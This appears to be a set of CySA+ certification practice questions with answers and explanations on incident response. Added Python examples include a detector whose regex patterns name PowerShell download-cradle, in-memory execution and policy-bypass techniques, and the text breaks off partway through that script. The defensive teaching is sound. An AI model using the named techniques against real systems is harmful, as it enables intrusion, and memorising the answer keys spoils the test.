Question 1
A security analyst is monitoring network traffic and notices multiple failed login attempts originating from the same IP address over a short period. The analyst suspects this is a brute force attack. Which of the following steps should the analyst take FIRST to mitigate the risk?
A) Block the offending IP address and update firewall rules
B) Reset all user passwords across the organization
C) Deploy antivirus on all endpoints immediately
D) Conduct a full vulnerability assessment of the network
Answer: A
Explanation:
When a security analyst identifies multiple failed login attempts from the same IP address within a short timeframe, it strongly indicates a brute force attack: an attacker systematically guessing credentials until one combination works. The primary concern is to stop the attack before it compromises an account. The most immediate action is to block the offending IP address through firewall rules or network access controls, which cuts off further attempts from that source without disrupting the rest of the network. A practitioner should treat the block as a stopgap rather than a resolution: the analyst should also confirm whether any of the attempts succeeded, because an attacker who rotates source addresses, or who spreads a few attempts across many accounts (password spraying), is not stopped by a single-address block.
B resetting all user passwords is a reactive measure and can be disruptive to users; while it may eventually prevent compromised accounts from being exploited, it does not immediately stop ongoing attack attempts. C deploying antivirus on endpoints is essential for malware defense, but brute force attacks targeting login credentials are typically unrelated to endpoint malware. Antivirus installation will not mitigate immediate unauthorized login attempts. D conducting a full vulnerability assessment is a strategic action for identifying weaknesses in the network but is not an immediate mitigation against ongoing brute force attempts.
In a CompTIA CySA+ context, identifying and mitigating active threats is a core skill. Analysts must prioritize incident response actions based on immediacy and impact. Brute force attacks exploit weak passwords, predictable usernames, and authentication systems that lack rate limiting or lockout. Effective defensive strategies include account lockout or throttling policies, multifactor authentication (MFA), and monitoring logs for anomalous login activity. Analysts should also know how to correlate SIEM alerts, log data, and network flow analysis to detect the patterns that indicate credential-based attacks. By blocking malicious IPs immediately, analysts cut off the active source while planning subsequent steps such as password resets for any account that was actually accessed, security awareness training, and policy enforcement. This balance between prompt mitigation and minimal operational disruption is essential for security operations center (SOC) efficiency and is exactly what the scenario-based CySA+ questions test.
Question 2
A cybersecurity analyst is reviewing alerts from the SIEM and notices repeated SQL injection attempts on a web application. Which of the following is the BEST mitigation strategy to prevent these attacks from succeeding?
A) Apply web application firewall (WAF) rules to filter malicious input
B) Update endpoint antivirus signatures
C) Disable unused network ports on the server
D) Increase password complexity requirements for all users
Answer: A
Explanation:
SQL injection attacks exploit web applications that build SQL statements from untrusted input, so attacker-supplied text in a form field or request parameter is interpreted as part of the query. When a SIEM alerts the analyst to repeated SQL injection attempts, the best of the listed options is a web application firewall (WAF) with rules that detect and block malicious input. A WAF inspects HTTP/HTTPS requests and can drop those containing characters, keywords, or patterns characteristic of SQL injection, reducing the likelihood of database compromise while legitimate traffic continues to flow. Note that a WAF is a compensating control: signature-based filtering can be bypassed with alternate encodings or syntax variants, so the durable fix is in the application code itself (parameterized queries), and the WAF buys time until that fix is deployed.
B updating endpoint antivirus signatures is essential for malware prevention but is not directly related to preventing SQL injection attacks, which target application logic rather than local malware infection. C disabling unused network ports enhances network security but does not mitigate web application input vulnerabilities exploited by SQL injection. D increasing password complexity strengthens authentication but does not address the injection vector used to manipulate databases.
In the CompTIA CySA+ exam framework, analysts are expected to identify the threat vector, analyze logs, and implement precise mitigation strategies. SQL injection mitigation extends beyond WAFs; it includes parameterized queries, input validation, and secure coding practices. Analysts should also conduct regular vulnerability scanning, patch management, and penetration testing to identify and remediate potential injection points. Correlating SIEM alerts with web server logs and database logs allows analysts to verify the attack source and understand the frequency, providing a foundation for long-term security enhancements. This scenario reinforces critical CySA+ skills in application security monitoring, threat detection, and risk-based mitigation planning, emphasizing the importance of layered defenses against application-level attacks.
Question 3
During a threat hunting exercise, an analyst identifies unusual outbound traffic to an unfamiliar external IP address on port 443 from a workstation. Which of the following actions should the analyst perform NEXT to determine if this activity is malicious?
A) Conduct a reputation check on the external IP and examine the process generating traffic
B) Immediately block all outbound traffic from port 443
C) Reimage the affected workstation without further investigation
D) Disable user accounts associated with the workstation
Answer: A
Explanation:
Unusual outbound traffic on port 443, commonly used for HTTPS, can indicate malware communication, data exfiltration, or unauthorized remote access, and because the payload is encrypted the analyst cannot simply read it. The next logical step is to check the reputation of the external IP against threat intelligence sources and, at the same time, identify the process on the workstation that is generating the traffic (EDR process-to-connection mapping, or netstat-style output on the host) to determine whether it is legitimate software or a suspicious executable. The TLS handshake itself also yields useful metadata, such as the server name indication and certificate details, without decrypting the session. This approach aligns with CySA+ principles of evidence-based threat analysis and avoids premature mitigation steps that could disrupt operations unnecessarily.
B immediately blocking all outbound port 443 traffic could halt critical web services, creating unnecessary business disruption. C reimaging the workstation without analysis disregards the importance of collecting forensic evidence for root cause analysis and incident response documentation. D disabling user accounts may interrupt workflow and may not address the underlying malware or compromised system.
CompTIA CySA+ emphasizes threat hunting, incident analysis, and evidence collection. Analysts should leverage tools such as network flow analysis, endpoint detection and response (EDR) systems, and threat intelligence platforms to correlate unusual activity with known attack patterns. Understanding the normal baseline of outbound traffic, application behavior, and workstation usage allows analysts to distinguish benign anomalies from malicious activity. Once the threat is verified, containment, eradication, and recovery steps can be planned. Effective threat analysis integrates network monitoring, endpoint visibility, and actionable intelligence, reinforcing the need for structured investigation before applying mitigation measures that could affect operational continuity. This method ensures a risk-informed response, which is central to the CySA+ objectives.
Question 4
A security analyst receives an alert that multiple endpoints are reporting unexpected registry changes and attempts to connect to an unfamiliar command-and-control server. Which of the following best describes the type of threat being observed?
A) Advanced persistent threat (APT)
B) Phishing attack
C) Insider threat
D) Denial-of-service attack
Answer: A
Explanation:
Unexpected registry modifications across multiple endpoints, combined with attempts to communicate with an unknown command-and-control (C2) server, describe malware that has established persistence and is awaiting instructions. Of the options given, this matches an advanced persistent threat (APT): a targeted, well-resourced adversary that maintains long-term access to a network for espionage or data exfiltration. APTs typically use custom malware, lateral movement, and stealthy persistence mechanisms such as registry Run keys, scheduled tasks, or hidden services to keep a foothold without detection, and the C2 channel lets them issue commands, update their tooling, and exfiltrate data while bypassing traditional controls. In practice, commodity malware shows the same two indicators, so an analyst should treat them as evidence of an active intrusion and reserve the APT label for when the targeting, tooling, and dwell time support it; the answer here follows from the other three options not fitting the observed behavior at all.
B phishing describes a delivery method, not the behavior observed here: it relies on social engineering to trick users into revealing credentials or opening malicious content, and while a phishing email may well have been the initial entry point, registry modifications and C2 connections are post-compromise activity that the term does not cover. C insider threats involve legitimate users abusing their access, typically without malware persistence or external C2 communication, and usually manifest as internal data theft or sabotage. D denial-of-service attacks aim to disrupt availability and do not modify registry keys or establish covert communication channels.
CySA+ certification requires analysts to differentiate between attack types, understand TTPs (tactics, techniques, and procedures), and identify indicators of compromise (IOCs). Analysts must monitor endpoint behavior, network communication patterns, and persistent malware artifacts to detect APT activity effectively. Indicators include registry anomalies, unexpected process execution, unusual outbound traffic, and lateral movement. Once identified, the analyst should initiate containment procedures, such as isolating affected systems, performing forensic analysis, and eradicating malware while preserving logs for post-incident review. Understanding APTs also involves correlating multiple alerts and leveraging behavioral analytics, EDR tools, and threat intelligence to trace the attacker’s methods and anticipate subsequent actions. Recognizing the characteristics of APTs is fundamental for effective threat detection and response.
Question 5
A company is concerned about potential insider threats. The cybersecurity team wants to detect abnormal user activity patterns, such as accessing sensitive files at unusual hours. Which of the following tools or approaches would BEST support this objective?
A) User and entity behavior analytics (UEBA)
B) Traditional antivirus scanning
C) Network packet sniffing only
D) Enforcing multi-factor authentication
Answer: A
Explanation:
Detecting insider threats often requires monitoring behavioral anomalies rather than simply known malware signatures. User and entity behavior analytics (UEBA) is a security analytics approach that leverages machine learning, statistical models, and baseline activity profiling to detect unusual user or system activity. By establishing normal behavioral patterns, UEBA can flag deviations such as accessing sensitive data at abnormal hours, downloading large amounts of data, or attempting unauthorized administrative actions. This proactive approach allows organizations to identify potential insider threats before they escalate into data breaches or sabotage.
B traditional antivirus scanning detects malware on endpoints but does not analyze patterns of legitimate user activity or behavioral deviations indicative of insider threats. C network packet sniffing provides raw traffic analysis but requires additional correlation and context to identify abnormal behavior patterns. D enforcing multi-factor authentication enhances access security but does not actively detect suspicious activity after access is granted.
CySA+ emphasizes the importance of behavior-based threat detection, anomaly identification, and proactive monitoring. UEBA solutions integrate with SIEM platforms to correlate login times, file access events, privileged account usage, and other logs to detect high-risk behavior. Analysts can configure alert thresholds, prioritize alerts based on risk scoring, and perform investigative follow-ups to determine whether the activity is malicious, accidental, or benign. Insider threats are particularly challenging because they originate from authorized users, making traditional perimeter defenses insufficient. By leveraging UEBA, analysts gain visibility into contextual behavioral patterns, allowing for early detection and mitigation while balancing operational efficiency and privacy considerations. This knowledge aligns directly with CySA+ objectives in behavioral analytics and insider threat mitigation strategies.
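The following is an added example, not code from the original page or from any UEBA product. It shows the baselining idea behind UEBA in its simplest form: learn each user's normal hours and normal daily volume of sensitive-file access from history, then flag events that fall outside either. The events, the user names, the path prefixes that count as sensitive, and the mean-plus-three-sigma threshold are all constructed assumptions for the example; a commercial UEBA platform uses richer models, but the logic of "baseline, then deviation" is the same.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta
from statistics import mean, pstdev

# Paths whose access is worth baselining (assumption: sensitivity comes from a data classification).
SENSITIVE_PREFIXES = ("/finance/", "/hr/")


def _constructed_baseline():
    """Twenty days of routine activity: alice works finance files 09-16, bob edits notes 08-17.
    Constructed sample data, not real audit logs."""
    events = []
    first_day = datetime(2024, 3, 4)
    for day in range(20):
        d = first_day + timedelta(days=day)
        for hour in (9, 11, 14, 16):
            events.append(("alice", d.replace(hour=hour, minute=5).isoformat(), "/finance/ledger.xlsx"))
        for hour in (8, 10, 13, 17):
            events.append(("bob", d.replace(hour=hour, minute=20).isoformat(), "/eng/notes.md"))
    return events


BASELINE_EVENTS = _constructed_baseline()

# Events under review (constructed): a 02:30 HR file read and a bulk pull of eight finance files.
NEW_EVENTS = [
    ("bob", "2024-04-01T13:05:00", "/eng/notes.md"),
    ("alice", "2024-04-01T02:30:00", "/hr/salaries.csv"),
] + [("alice", f"2024-04-02T10:{m:02d}:00", f"/finance/report{m}.xlsx") for m in range(8)]


def build_baseline(events):
    """Per user: which hours of the day they are normally active, and how many
    sensitive files they touch per day."""
    hours_seen = defaultdict(Counter)        # user -> hour of day -> count
    daily_sensitive = defaultdict(Counter)   # user -> date -> sensitive accesses
    for user, ts, path in events:
        t = datetime.fromisoformat(ts)
        hours_seen[user][t.hour] += 1
        if path.startswith(SENSITIVE_PREFIXES):
            daily_sensitive[user][t.date()] += 1
    return hours_seen, daily_sensitive


def daily_threshold(counts):
    """Mean plus three standard deviations of the baseline's per-day sensitive access
    counts; sigma is floored at 1 so a perfectly regular history does not collapse the
    threshold onto the mean. No history at all means any sensitive access is notable."""
    if not counts:
        return 0
    return mean(counts) + 3 * max(pstdev(counts), 1)


def detect(baseline_events, new_events):
    hours_seen, daily_sensitive = build_baseline(baseline_events)
    running = defaultdict(Counter)           # sensitive accesses seen so far, user -> date -> count
    findings = []
    for user, ts, path in new_events:
        t = datetime.fromisoformat(ts)
        reasons = []
        # Off-hours: no baseline activity within an hour either side (wraps past midnight).
        neighbours = {(t.hour + delta) % 24 for delta in (-1, 0, 1)}
        if not any(hours_seen[user][h] for h in neighbours):
            reasons.append("off-hours")
        if path.startswith(SENSITIVE_PREFIXES):
            running[user][t.date()] += 1
            if running[user][t.date()] > daily_threshold(list(daily_sensitive[user].values())):
                reasons.append("volume-spike")
        if reasons:
            findings.append({"user": user, "time": ts, "path": path, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in detect(BASELINE_EVENTS, NEW_EVENTS):
        print(f"{f['time']} {f['user']} {f['path']} -> {', '.join(f['reasons'])}")
```

Run as a script it reports two findings: the 02:30 read of the HR file (alice has never been active between 01:00 and 03:00) and the eighth finance file of the day (her baseline is four per day with no variance, so the threshold is seven). The seven files before it are not flagged, which is the point of baselining rather than alerting on every sensitive access.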
Question 6
A cybersecurity analyst observes a sudden spike in outbound network traffic from several workstations to external IP addresses in a foreign country. This activity is atypical for the organization. Which of the following actions should the analyst take FIRST to investigate this behavior?
A) Conduct an endpoint analysis to identify suspicious processes
B) Immediately block all outbound traffic globally
C) Revoke all VPN access for remote employees
D) Update antivirus definitions across all endpoints
Answer: A
Explanation:
When an analyst detects an unusual surge in outbound traffic directed toward external IP addresses—especially in foreign regions not normally accessed by the organization—it signals a potential data exfiltration attempt or malware command-and-control (C2) communication. The first and most effective step is to conduct an endpoint analysis, focusing on identifying the processes responsible for generating the traffic. This involves using endpoint detection and response (EDR) tools, task monitoring, and process inspection to determine if legitimate applications are causing the traffic or if malicious executables are operating in the background.
B immediately blocking all outbound traffic could cause severe operational disruption, especially for critical business functions requiring internet access. C revoking VPN access might prevent external access but does not address the ongoing exfiltration from compromised workstations. D updating antivirus definitions is good for overall security hygiene but is not a direct investigative action and may not detect advanced threats that bypass signature-based solutions.
In the context of CompTIA CySA+, analysts are expected to apply structured investigative procedures: identifying anomalies, collecting relevant evidence, and understanding the scope and source of threats. Key techniques include network flow analysis, packet inspection, endpoint log review, and correlation of SIEM alerts. Analysts should also review historical network baselines to understand deviations from normal behavior. Identifying the offending process helps determine whether the activity is part of a malware infection, insider threat, or misconfigured application. Proper documentation and chain-of-custody procedures are also vital if the investigation escalates to a formal incident response. By focusing first on endpoint analysis, the analyst ensures that remediation efforts are targeted, evidence-driven, and minimally disruptive, which is aligned with the strategic objectives tested on the CySA+ exam.
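As an added example serving this question and Question 3 above (it is not part of the original page), the code below does the triage both explanations describe: compare each host's outbound volume against its own history, and for any host that spikes, list the processes and destinations responsible together with a reputation check, a first-seen check, and a country check. The flow records, the internal address ranges, the threat-intelligence list, and the GeoIP dictionary are all constructed for the example (external addresses are from the RFC 5737 documentation ranges); in production the last two would be lookups against a real feed and a GeoIP database.

```python
import ipaddress
from collections import defaultdict
from statistics import mean, pstdev

MB = 1_000_000

# Assumptions, all constructed for the example: the organisation's own address space,
# a stand-in for a threat-intelligence feed, and a stand-in for a GeoIP lookup.
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8"), ipaddress.ip_network("192.168.0.0/16")]
TI_BAD_NETS = [ipaddress.ip_network("203.0.113.0/24")]
GEO = {"203.0.113.77": "ZZ", "198.51.100.9": "US", "192.0.2.10": "US"}
EXPECTED_COUNTRIES = {"US"}


def _constructed_flows():
    """Flow records already joined to the EDR's process attribution:
    (day, host, process, dst_ip, dst_port, bytes_out). Constructed sample data."""
    history = []
    for day in range(1, 8):
        history += [
            (day, "ws01", "chrome.exe", "198.51.100.9", 443, 50 * MB),
            (day, "ws01", "svchost.exe", "192.0.2.10", 443, 5 * MB),
            (day, "ws01", "outlook.exe", "10.0.5.20", 443, 20 * MB),   # internal, not counted
            (day, "ws02", "chrome.exe", "198.51.100.9", 443, 55 * MB),
        ]
    today = [
        (8, "ws01", "chrome.exe", "198.51.100.9", 443, 52 * MB),
        (8, "ws01", "update.exe", "203.0.113.77", 443, 400 * MB),
        (8, "ws02", "chrome.exe", "198.51.100.9", 443, 58 * MB),
    ]
    return history, today


HISTORY, TODAY = _constructed_flows()


def is_external(ip):
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def ti_hit(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in TI_BAD_NETS)


def daily_external_bytes(flows):
    totals = defaultdict(lambda: defaultdict(int))   # host -> day -> bytes
    for day, host, _proc, dst, _port, nbytes in flows:
        if is_external(dst):
            totals[host][day] += nbytes
    return totals


def triage(history, today):
    """Flag hosts whose outbound volume exceeds mean + 3 sigma of their own history and,
    for each flagged host, list the (process, destination) pairs responsible."""
    baseline = daily_external_bytes(history)
    known_dsts = defaultdict(set)
    for _day, host, _proc, dst, _port, _n in history:
        known_dsts[host].add(dst)

    by_host = defaultdict(list)
    for rec in today:
        if is_external(rec[3]):
            by_host[rec[1]].append(rec)

    findings = {}
    for host, recs in by_host.items():
        total = sum(r[5] for r in recs)
        hist = list(baseline[host].values())
        mu = mean(hist) if hist else 0
        sigma = pstdev(hist) if hist else 0
        threshold = mu + 3 * max(sigma, 0.1 * mu)   # floor sigma at 10% of the mean
        if total <= threshold:
            continue
        contributors = [
            {
                "process": proc,
                "dst": f"{dst}:{port}",
                "bytes": nbytes,
                "ti_hit": ti_hit(dst),
                "new_destination": dst not in known_dsts[host],
                "unexpected_country": GEO.get(dst, "unknown") not in EXPECTED_COUNTRIES,
            }
            for _day, _host, proc, dst, port, nbytes in sorted(recs, key=lambda r: -r[5])
        ]
        findings[host] = {"today_bytes": total, "threshold": threshold, "contributors": contributors}
    return findings


if __name__ == "__main__":
    for host, f in triage(HISTORY, TODAY).items():
        print(f"{host}: {f['today_bytes'] // MB} MB out vs threshold {f['threshold'] // MB:.0f} MB")
        for c in f["contributors"]:
            print("   ", c)
```

Only ws01 is reported: its 452 MB is far above the 71.5 MB threshold derived from its own 55 MB/day history, and the top contributor is an unfamiliar process talking to a never-before-seen address that is both on the threat list and in an unexpected country. ws02 sent slightly more than usual and is left alone, which is why the baseline is per host rather than a single global number.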
Question 7
An organization is deploying a new cloud-based application that handles sensitive customer data. The security team wants to ensure proper access control and auditing of all activity within the application. Which of the following is the MOST effective approach?
A) Implement role-based access control (RBAC) and enable detailed logging
B) Require employees to change passwords every 30 days
C) Deploy endpoint antivirus on all devices
D) Disable multi-factor authentication to simplify access
Answer: A
Explanation:
Cloud-based applications that manage sensitive data require a comprehensive access control and auditing strategy to prevent unauthorized access and facilitate accountability. The most effective approach is to implement role-based access control (RBAC), which assigns permissions based on job roles and responsibilities, ensuring users have the minimum privileges necessary to perform their duties. In parallel, detailed logging and auditing should be enabled to track every action, including login attempts, file access, and administrative changes. This dual approach enforces security while providing visibility for compliance and forensic investigations.
B requiring frequent password changes can improve security marginally but does not provide granular access control or logging for auditing purposes. C deploying antivirus protects endpoints from malware but does not address access management or auditing within the application itself. D disabling multi-factor authentication reduces security and exposes the organization to credential-based attacks, making it counterproductive.
In the CompTIA CySA+ framework, analysts are tasked with evaluating security controls in cloud environments, where identity and access management (IAM), monitoring, and auditing are fundamental. RBAC limits each role to the privileges its duties require, so a compromised credential or a malicious insider exposes only what that role can reach. Logging enables analysts to perform behavioral analytics, anomaly detection, and incident investigation, and supplies the evidence trail that regulations and standards such as GDPR, HIPAA, or ISO 27001 expect. Forwarding those logs to a SIEM allows automated alerts on unusual access patterns, such as a role being used outside its normal scope, enhancing proactive threat detection. Proper configuration of cloud access controls and auditing mechanisms is therefore a cornerstone of secure cloud operations, combining strategic planning, policy enforcement, and technical implementation, all of which are central to CySA+ exam objectives.
Question 8
A security analyst is investigating a malware infection that encrypts user files and displays a ransom note demanding cryptocurrency. Which of the following is the MOST critical action the analyst should take to preserve evidence for further analysis?
A) Isolate affected systems from the network but do not power them down
B) Immediately power down all affected systems to stop encryption
C) Delete the ransom note to prevent confusion
D) Remove the malware using antivirus software before analysis
Answer: A
Explanation:
When dealing with ransomware infections, preserving forensic evidence is crucial for understanding the attack vector, identifying malware behavior, and supporting potential law enforcement investigations. The most critical step is to isolate affected systems from the network to prevent further spread of the malware while avoiding powering them down, which could destroy volatile memory containing valuable forensic information such as encryption keys, active processes, network connections, and malware memory artifacts. Isolation maintains system integrity and allows analysts to conduct a detailed investigation.
B immediately powering down systems risks losing volatile data that may be essential for understanding the malware’s mechanisms and tracing its origin. C deleting the ransom note eliminates evidence that may contain key details such as the attacker’s email, cryptocurrency wallet, or specific identifiers. D removing malware prematurely may destroy forensic artifacts and critical information needed for analysis or recovery.
CompTIA CySA+ emphasizes incident response, malware analysis, and evidence preservation. Analysts should capture memory first, because network isolation stops the malware from spreading or reaching its operators but does not stop encryption that is already running locally; a memory image taken early preserves keys, processes, and connections even if the host later has to be shut down. They should then collect system logs and file system images, documenting every step to maintain chain of custody. Using EDR tools and forensic imaging techniques ensures that data remains intact for reverse engineering or threat intelligence correlation. Understanding ransomware behavior, including encryption methods, persistence mechanisms, and communication with command-and-control servers, is vital for effective containment, eradication, and recovery. Analysts should also correlate network traffic with SIEM logs to identify lateral movement or exfiltration attempts, since many ransomware operators steal data before encrypting it. This structured response prioritizes evidence preservation, operational containment, and future threat mitigation, aligning with the CySA+ certification objectives and real-world practice.
Question 9
A security analyst is analyzing logs and notices repeated alerts indicating attempts to exploit outdated software vulnerabilities on several servers. Which of the following should the analyst recommend to prevent future exploitation?
A) Implement a rigorous patch management program and prioritize high-risk vulnerabilities
B) Increase the strength of user passwords
C) Disable all network services to eliminate attack surfaces
D) Deploy endpoint antivirus on all servers
Answer: A
Explanation:
Repeated exploitation attempts targeting outdated software signify that attackers are scanning for and leveraging unpatched vulnerabilities, which is a common vector for unauthorized access or ransomware deployment. The most effective preventive measure is to implement a structured patch management program, prioritizing vulnerabilities based on severity, potential impact, and likelihood of exploitation. This ensures that critical software updates are applied promptly, reducing the attack surface and preventing repeated exploitation attempts.
B increasing user password strength does not directly mitigate vulnerabilities in server software, as exploitation occurs at the application or service layer rather than the authentication layer. C disabling all network services is impractical and would disrupt business operations while providing minimal targeted mitigation. D deploying antivirus alone cannot prevent exploitation of unpatched software vulnerabilities, particularly for attacks leveraging zero-day or advanced exploits.
For CySA+ certification, analysts are expected to identify patterns of repeated attacks, assess system vulnerabilities, and recommend proactive remediation measures. Patch management is central to risk reduction strategies and complements other cybersecurity controls like intrusion detection systems (IDS), SIEM correlation, and endpoint monitoring. Analysts should also maintain an inventory of assets, regularly scan for vulnerabilities, and prioritize patching based on business criticality. Combining these practices with ongoing monitoring allows for early detection and rapid response, minimizing downtime, protecting sensitive data, and ensuring compliance with regulatory frameworks. Understanding the interplay between threat intelligence, vulnerability management, and incident response is critical for a holistic approach to enterprise cybersecurity, aligning with the objectives tested on the CySA+ exam.
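The explanation says to prioritize by severity, impact, and likelihood of exploitation. The added example below (not from the original page) turns that into a ranking: CVSS weighted by asset criticality, internet exposure, and whether the vulnerability is known to be exploited in the wild, mapped to a remediation deadline and to a patch-or-compensate action. The findings, the placeholder labels, the multipliers, and the SLA tiers are constructed assumptions; real findings would carry CVE identifiers and the weights would follow the organisation's own risk appetite.

```python
from dataclasses import dataclass


@dataclass
class Finding:
    asset: str
    label: str               # placeholder; real findings carry a CVE identifier
    cvss: float              # base score from the scanner
    asset_criticality: int   # 1 = low, 2 = medium, 3 = high business impact
    internet_exposed: bool
    known_exploited: bool    # e.g. listed in CISA's Known Exploited Vulnerabilities catalogue
    patch_available: bool


# Weights are assumptions for the example; tune them to the organisation's risk appetite.
EXPOSURE_MULTIPLIER = 1.5
EXPLOITED_MULTIPLIER = 2.0


def risk_score(f):
    """Severity adjusted for what the asset is worth, whether attackers can reach it,
    and whether exploitation is already happening in the wild."""
    score = f.cvss * f.asset_criticality
    if f.internet_exposed:
        score *= EXPOSURE_MULTIPLIER
    if f.known_exploited:
        score *= EXPLOITED_MULTIPLIER
    return round(score, 1)


def remediation_sla_days(f):
    """Deadline tiers (assumed): actively exploited and reachable gets an emergency window."""
    if f.known_exploited and f.internet_exposed:
        return 2
    s = risk_score(f)
    if s >= 30:
        return 7
    if s >= 15:
        return 30
    return 90


def recommended_action(f):
    if f.patch_available:
        return "patch"
    return "compensating control (segmentation, WAF or IPS signature) and vendor follow-up"


def prioritize(findings):
    return sorted(findings, key=lambda f: (-risk_score(f), f.asset))


# Constructed findings, not real scan output.
FINDINGS = [
    Finding("ws-lab-07", "VULN-A", 9.8, 1, False, False, True),
    Finding("srv-db-01", "VULN-B", 9.8, 3, False, False, True),
    Finding("srv-web-01", "VULN-C", 7.5, 3, True, True, True),
    Finding("srv-app-02", "VULN-D", 6.5, 2, True, False, False),
]


def plan(findings):
    return [
        {"asset": f.asset, "label": f.label, "score": risk_score(f),
         "sla_days": remediation_sla_days(f), "action": recommended_action(f)}
        for f in prioritize(findings)
    ]


if __name__ == "__main__":
    for row in plan(FINDINGS):
        print(row)
```

The ordering is the lesson: the CVSS 7.5 flaw on the exposed, actively exploited web server outranks both CVSS 9.8 findings, and the isolated lab workstation with the same 9.8 lands last with a 90-day window. The application server with no patch available still gets a 30-day deadline, but its action is a compensating control rather than "wait for the vendor".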
Question 10
During routine monitoring, a security analyst observes that an attacker has gained unauthorized access to an internal system and is attempting lateral movement to other hosts. Which of the following steps represents the BEST immediate response?
A) Contain the affected system to prevent further lateral movement
B) Notify all users to log out immediately
C) Perform a full malware scan of the entire network
D) Reboot all servers to terminate active sessions
Answer: A
Explanation:
When an attacker successfully gains access to a system and attempts lateral movement, the immediate priority is to contain the affected system to prevent compromise of additional hosts. Containment involves isolating the compromised host from the network, monitoring its connections, and stopping malicious processes. This action limits the attack’s scope, allowing the security team to analyze the threat, identify affected systems, and plan remediation.
B notifying all users to log out may reduce potential exposure but does not isolate the compromised host directly or prevent the attacker from moving laterally. C performing a full malware scan of the network is reactive and time-consuming; the threat may continue to propagate while the scan is in progress. D rebooting servers may terminate active sessions but can destroy volatile forensic evidence and does not guarantee that the attacker’s foothold or backdoors are removed.
CompTIA CySA+ emphasizes incident response procedures, threat containment, and minimizing organizational impact. Analysts should follow established playbooks for containment, preserve evidence for forensic analysis, and coordinate with IT teams to prevent data loss. Lateral movement is often detected through anomalies in network traffic, unusual authentication patterns, and alerts from endpoint detection systems. Effective containment strategies include network segmentation, firewall rules, endpoint isolation, and monitoring communication channels for suspicious activity. Analysts must also plan follow-up remediation steps such as patching vulnerabilities, removing malware, resetting credentials, and strengthening detection capabilities to prevent recurrence. Proper execution of these measures ensures that incident response is methodical, evidence-based, and aligned with enterprise cybersecurity objectives, directly reflecting the competencies tested on the CySA+ exam.
Question 11
A security analyst is reviewing endpoint telemetry from an EDR platform and notices multiple devices generating alerts related to suspicious PowerShell commands that appear to be obfuscated. The commands are contacting unknown remote servers and attempting to download additional payloads. Which of the following should the analyst do FIRST to mitigate the threat?
A) Isolate the affected endpoints from the network
B) Reset all user account passwords
C) Disable PowerShell across the entire organization
D) Rebuild every affected workstation immediately
Answer: A
Explanation:
When an analyst begins observing a surge of alerts generated by suspicious PowerShell activity—particularly obfuscated commands communicating with external servers—this indicates a strong likelihood of fileless malware, remote command execution attempts, or active exploitation. The first immediate action should always be containment, which is achieved by isolating the affected endpoints. This prevents further communication with command-and-control hosts, halts propagation through the network, and preserves volatile evidence essential for forensic examination.
A isolation is the correct choice because it adheres to the core principles of incident response: containment before eradication. EDR platforms typically offer isolation features that sever external communication while allowing forensic and administrative access for analysts. This prevents malicious payloads from being downloaded or executed while enabling the security team to perform targeted investigation.
B resetting passwords is a recommended later step but not the first. Credential theft may well have occurred, since PowerShell tooling is commonly used to dump credentials from memory and the stolen material then feeds techniques such as pass-the-hash, but password resets alone do not stop the ongoing malicious communication or code execution.
C disabling PowerShell enterprise-wide is overly broad and disruptive. Many organizations rely on PowerShell for automation, configuration management, and secure remoting. Disabling it without proper analysis can hinder IT operations and may not stop the underlying compromise.
D rebuilding workstations is an extreme remediation step. While reimaging may eventually be necessary for systems deeply affected by fileless malware, it should not be done before containment and forensic review. Premature rebuilding erases valuable memory-resident artifacts such as encoded commands, malicious scripts, credentials in memory, and active network connections.
From a CySA+ perspective, analysts must thoroughly understand the behavior and indicators associated with PowerShell exploitation. Attackers frequently use living-off-the-land binaries (LOLBins), including PowerShell, to bypass traditional defenses. Obfuscation, such as Base64 encoding (the -EncodedCommand argument takes the script as Base64 of its UTF-16LE bytes), string concatenation, or character substitution, makes the malicious command harder to match with signatures but no harder to analyze once decoded. EDR tools reveal process lineage, command-line arguments, script block logs (PowerShell script block logging, Windows event ID 4104, records the de-obfuscated script as it is compiled), and network destinations, giving analysts visibility into the attack chain.
Key steps after isolation include capturing memory dumps, exporting process trees, analyzing script block logs, reviewing network flows to external IP addresses, and checking for persistence mechanisms such as scheduled tasks or registry modifications.
The overarching goal is to stop the execution, understand the root cause, remove any artifacts, and prevent future incidents. Containment ensures that investigation can proceed safely and methodically, aligning perfectly with CySA+ incident response frameworks.
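An added example, not code from the original page: decoding the -EncodedCommand blob from EDR command-line telemetry and scoring the result against a few indicator families (download cradle, in-memory execution, stealth switches, remote URL). The three command lines are constructed, the indicator patterns are the author's own choices for illustration rather than a vendor ruleset, and the URL in the malicious sample uses an RFC 5737 documentation address. The verdict logic deliberately treats encoding on its own as "review" rather than "isolate", because deployment and orchestration tools use -EncodedCommand legitimately.

```python
import base64
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
_ENC_FLAGS = "|".join(re.escape("encodedcommand"[:i]) for i in range(14, 0, -1))
ENC_RE = re.compile(rf"(?:^|\s)[-/](?:{_ENC_FLAGS})\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Indicator families. Patterns are the author's choices for this example, not a vendor ruleset.
INDICATORS = {
    "download-cradle": re.compile(
        r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I),
    "in-memory-exec": re.compile(
        r"Invoke-Expression|\biex\b|\[Reflection\.Assembly\]::Load|FromBase64String", re.I),
    "stealth-switches": re.compile(
        r"-nop\b|-noprofile\b|-w(?:indowstyle)?\s+hidden|-noni\b|-noninteractive\b"
        r"|-ep\s+bypass|-executionpolicy\s+bypass", re.I),
    "remote-url": re.compile(r"https?://\S+", re.I),
}


def split_encoded(cmdline):
    """Return (command line with the blob replaced by <encoded>, decoded script or None).
    -EncodedCommand carries Base64 of the script's UTF-16LE bytes, hence the utf-16le decode."""
    m = ENC_RE.search(cmdline)
    if not m:
        return cmdline, None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except ValueError:
        return cmdline, None
    stripped = cmdline[:m.start(1)] + "<encoded>" + cmdline[m.end(1):]
    return stripped, raw.decode("utf-16le", errors="replace")


def analyze(cmdline):
    outer, decoded = split_encoded(cmdline)
    text = outer if decoded is None else f"{outer}\n{decoded}"
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    # Encoding alone is weak evidence. A download cradle combined with in-memory
    # execution is the pattern that justifies isolating the host.
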